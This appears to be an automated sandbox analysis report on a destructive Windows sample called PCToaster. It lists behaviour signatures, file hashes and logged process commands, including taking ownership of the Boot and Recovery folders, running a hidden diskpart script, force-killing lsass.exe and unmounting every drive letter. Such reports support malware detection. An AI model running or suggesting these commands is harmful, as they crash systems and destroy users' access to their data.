Analysis Overview
SHA256
839e2e8904c5d91ab82e848a0f5ee93de32cf1d8539a9be8676d77c948e8ad14
Threat Level: Likely malicious
The file PCToaster.zip was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies file permissions
Enumerates connected drives
Drops file in Windows directory
Unsigned PE
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 15:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 15:44
Reported
2024-06-19 15:46
Platform
win10-20240404-en
Max time kernel
105s
Max time network
85s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PCToaster.exe
"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Windows\SYSTEM32\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\scr.txt
C:\Windows\SYSTEM32\diskpart.exe
diskpart /s C:\Users\Admin\AppData\Local\Temp\scr.txt
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Boot /r
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Recovery /r
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\taskkill.exe
taskkill /im lsass.exe /f
C:\Windows\SYSTEM32\mountvol.exe
mountvol A: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol B: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol D: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol E: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol F: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol G: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol H: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol I: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol J: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol K: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol L: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol M: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol N: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol O: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol P: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Q: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol R: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol S: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol T: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol U: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol V: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol W: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol X: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Y: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Z: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol C: /d
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4948-0-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4184-3-0x0000027A2F7C0000-0x0000027A2FA30000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 410c8faa8c12c7fa5b49d32a1503e4f9 |
| SHA1 | 7700654c3abc921d9e1483a741bcff1212e4021f |
| SHA256 | a851ff77969762d03848c31ca36083c8b37d7abef360bcaded11432ea6474c7b |
| SHA512 | d7d87c6916afb7e23d23ee62d9501ea4d427962ee4627f5f8300e515bd4b34df32fc6bedfd345dac52387b407f58c76ffab8e7ac4bd9783d294a68e59382ccab |
C:\Users\Admin\AppData\Local\Temp\scr.txt
| MD5 | ad1869d6f0b2b809394605d3e73eeb74 |
| SHA1 | 4bdedd14bfea9f891b98c4cc82c5f82a58df67f6 |
| SHA256 | 7e9cde40095f2a877375cb30fecd4f64cf328e3ab11baed5242f73cbb94bd394 |
| SHA512 | 8fe0f269daf94feaa246a644dbeeda52916855f1d2bfd2c6c876c7c9c80b0ceb7e42caf0b64a70bda9a64d4529b885aaa38998a515d6abbe88ad367e72324136 |
memory/4184-24-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-27-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-29-0x0000027A2F7C0000-0x0000027A2FA30000-memory.dmp
memory/4184-79-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-103-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-116-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-121-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-123-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-126-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp